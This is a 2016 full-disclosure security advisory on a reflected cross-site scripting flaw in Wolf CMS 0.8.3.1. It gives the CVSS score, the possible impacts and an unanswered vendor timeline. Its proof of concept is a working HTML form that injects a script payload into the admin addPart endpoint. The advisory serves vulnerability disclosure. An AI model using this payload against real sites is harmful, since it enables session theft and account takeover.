Wolf CMS v0.8.3.1: XSS
Date: 2016-01-28 09:50:141. Introduction
| Affected Product: | Wolf CMS v0.8.3.1 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Website: | https://www.wolfcms.org/ |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 12/10/2015 |
| Disclosed to public: | 01/28/2016 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits | Tim Coen of curesec GmbH |
2. Overview
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Wolf CMS is a content management system written in PHP. In version 0.8.3.1, it is vulnerable to reflected XSS.
The vulnerability can lead to the stealing of cookies, injection of JavaScript keyloggers, or the bypassing of CSRF protection. If the victim is in the Editor role, successful exploitation may lead to code execution via a different vulnerability in the same version of Wolf CMS.
3. Proof of Concept
<html> <body> <form action="http://localhost/wolfcms/?/admin/page/addPart" method="POST"> <input type="hidden" name="part[index]" value=""><script>alert(1)</script>" /> <input type="hidden" name="part[name]" value="hihuk" /> <input type="submit" value="Submit request" /> </form> </body> </html>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
| 12/10/2015 | Informed Vendor about Issue (no reply) |
| 01/10/2016 | Reminded Vendor of Disclosure Date (no reply) |
| 01/28/2016 | Disclosed to public |